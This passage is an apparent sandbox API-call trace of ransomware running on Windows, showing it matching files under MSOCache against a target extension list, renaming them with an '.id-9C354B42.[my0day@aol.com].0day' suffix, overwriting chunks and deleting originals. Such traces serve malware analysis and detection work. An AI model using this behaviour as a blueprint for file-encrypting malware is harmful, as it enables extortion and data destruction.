dwFileAttributes=0x2020) returned 1 [0044.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.812] lstrlenW (lpString=".doc") returned 4 [0044.812] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.812] lstrlenW (lpString=".docx") returned 5 [0044.812] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.812] lstrlenW (lpString=".pdf") returned 4 [0044.812] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.812] lstrlenW (lpString=".xls") returned 4 [0044.812] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.812] lstrlenW (lpString=".xlsx") returned 5 [0044.812] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.812] lstrlenW (lpString=".ppt") returned 4 [0044.812] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.812] lstrlenW (lpString=".zip") returned 4 [0044.812] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.812] lstrlenW (lpString=".rar") returned 4 [0044.812] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.812] lstrlenW (lpString=".bz2") returned 4 [0044.812] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.812] lstrlenW (lpString=".7z") returned 3 [0044.812] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.812] lstrlenW (lpString=".dbf") returned 4 [0044.812] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.812] lstrlenW (lpString=".1cd") returned 4 [0044.812] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.812] lstrlenW (lpString=".jpg") returned 4 [0044.812] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.812] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.813] lstrlenW (lpString=".doc") returned 4 [0044.813] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.813] lstrlenW (lpString=".docx") returned 5 [0044.813] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.813] lstrlenW (lpString=".pdf") returned 4 [0044.813] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.813] lstrlenW (lpString=".xls") returned 4 [0044.813] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.813] lstrlenW (lpString=".xlsx") returned 5 [0044.813] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.813] lstrlenW (lpString=".ppt") returned 4 [0044.813] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.813] lstrlenW (lpString=".zip") returned 4 [0044.813] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.813] lstrlenW (lpString=".rar") returned 4 [0044.813] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.813] lstrlenW (lpString=".bz2") returned 4 [0044.813] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.813] lstrlenW (lpString=".7z") returned 3 [0044.813] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.813] lstrlenW (lpString=".dbf") returned 4 [0044.813] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.813] lstrlenW (lpString=".1cd") returned 4 [0044.813] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0044.813] lstrlenW (lpString=".jpg") returned 4 [0044.813] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.813] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0044.813] lstrlenW (lpString="ProPlusrWW.msi") returned 14 [0044.814] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.814] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=27532288) returned 1 [0044.814] CloseHandle (hObject=0x208) returned 1 [0044.814] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi")) returned 0x2020 [0044.814] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.814] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0044.814] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0044.814] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0044.815] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.815] ReadFile (in: hFile=0x208, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.892] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.892] ReadFile (in: hFile=0x208, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.949] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.949] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0044.949] ReadFile (in: hFile=0x208, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.032] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.032] WriteFile (in: hFile=0x208, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0045.050] SetEndOfFile (hFile=0x208) returned 1 [0045.050] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3faa0a8 [0045.734] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.734] WriteFile (in: hFile=0x208, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.735] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.735] WriteFile (in: hFile=0x208, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.738] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.738] WriteFile (in: hFile=0x208, lpBuffer=0x3faa0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3faa0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.740] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3faa0a8 | out: hHeap=0x5f0000) returned 1 [0045.741] CloseHandle (hObject=0x208) returned 1 [0045.741] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0045.741] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.741] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.741] lstrlenW (lpString=".doc") returned 4 [0045.741] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.741] lstrlenW (lpString=".docx") returned 5 [0045.741] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0045.741] lstrlenW (lpString=".pdf") returned 4 [0045.741] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.741] lstrlenW (lpString=".xls") returned 4 [0045.741] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.741] lstrlenW (lpString=".xlsx") returned 5 [0045.741] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0045.742] lstrlenW (lpString=".ppt") returned 4 [0045.742] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.742] lstrlenW (lpString=".zip") returned 4 [0045.742] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.742] lstrlenW (lpString=".rar") returned 4 [0045.742] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.742] lstrlenW (lpString=".bz2") returned 4 [0045.742] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.742] lstrlenW (lpString=".7z") returned 3 [0045.742] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.742] lstrlenW (lpString=".dbf") returned 4 [0045.742] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.742] lstrlenW (lpString=".1cd") returned 4 [0045.742] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.742] lstrlenW (lpString=".jpg") returned 4 [0045.742] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.742] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.742] lstrlenW (lpString=".doc") returned 4 [0045.742] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.742] lstrlenW (lpString=".docx") returned 5 [0045.742] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0045.742] lstrlenW (lpString=".pdf") returned 4 [0045.742] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.742] lstrlenW (lpString=".xls") returned 4 [0045.742] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.742] lstrlenW (lpString=".xlsx") returned 5 [0045.742] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0045.742] lstrlenW (lpString=".ppt") returned 4 [0045.742] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.743] lstrlenW (lpString=".zip") returned 4 [0045.743] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.743] lstrlenW (lpString=".rar") returned 4 [0045.743] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.743] lstrlenW (lpString=".bz2") returned 4 [0045.743] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.743] lstrlenW (lpString=".7z") returned 3 [0045.743] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.743] lstrlenW (lpString=".dbf") returned 4 [0045.743] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0045.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.743] lstrlenW (lpString=".1cd") returned 4 [0045.743] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0045.743] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 77 [0045.743] lstrlenW (lpString=".jpg") returned 4 [0045.743] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0045.743] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0045.743] lstrlenW (lpString="ose.exe") returned 7 [0045.743] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.744] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=174440) returned 1 [0045.744] CloseHandle (hObject=0x208) returned 1 [0045.744] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0045.744] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.744] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.744] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.744] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.744] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.744] GetLastError () returned 0x0 [0045.744] ReadFile (in: hFile=0x208, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x2a968, lpOverlapped=0x0) returned 1 [0045.750] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0045.753] ReadFile (in: hFile=0x208, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0045.753] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0045.753] SetEndOfFile (hFile=0x20c) returned 1 [0045.753] CloseHandle (hObject=0x20c) returned 1 [0045.754] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.754] SetEndOfFile (hFile=0x208) returned 1 [0045.755] CloseHandle (hObject=0x208) returned 1 [0045.755] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0045.756] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0045.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.756] lstrlenW (lpString=".doc") returned 4 [0045.756] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0045.756] lstrlenW (lpString=".docx") returned 5 [0045.756] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0045.756] lstrlenW (lpString=".pdf") returned 4 [0045.756] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0045.756] lstrlenW (lpString=".xls") returned 4 [0045.756] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0045.756] lstrlenW (lpString=".xlsx") returned 5 [0045.756] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0045.756] lstrlenW (lpString=".ppt") returned 4 [0045.756] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0045.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.756] lstrlenW (lpString=".zip") returned 4 [0045.756] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0045.756] lstrlenW (lpString=".rar") returned 4 [0045.756] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0045.756] lstrlenW (lpString=".bz2") returned 4 [0045.756] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0045.756] lstrlenW (lpString=".7z") returned 3 [0045.756] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0045.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.756] lstrlenW (lpString=".dbf") returned 4 [0045.756] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0045.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.757] lstrlenW (lpString=".1cd") returned 4 [0045.757] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0045.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.757] lstrlenW (lpString=".jpg") returned 4 [0045.757] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0045.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.757] lstrlenW (lpString=".doc") returned 4 [0045.757] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0045.757] lstrlenW (lpString=".docx") returned 5 [0045.757] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0045.757] lstrlenW (lpString=".pdf") returned 4 [0045.757] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0045.757] lstrlenW (lpString=".xls") returned 4 [0045.757] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0045.757] lstrlenW (lpString=".xlsx") returned 5 [0045.757] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0045.757] lstrlenW (lpString=".ppt") returned 4 [0045.757] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0045.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.757] lstrlenW (lpString=".zip") returned 4 [0045.757] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0045.757] lstrlenW (lpString=".rar") returned 4 [0045.757] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0045.757] lstrlenW (lpString=".bz2") returned 4 [0045.757] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0045.757] lstrlenW (lpString=".7z") returned 3 [0045.757] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0045.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.757] lstrlenW (lpString=".dbf") returned 4 [0045.757] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0045.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.758] lstrlenW (lpString=".1cd") returned 4 [0045.758] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0045.758] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0045.758] lstrlenW (lpString=".jpg") returned 4 [0045.758] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0045.758] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0045.758] lstrlenW (lpString="osetup.dll") returned 10 [0045.758] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.758] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=7378792) returned 1 [0045.758] CloseHandle (hObject=0x208) returned 1 [0045.758] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0045.758] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.758] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0045.759] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 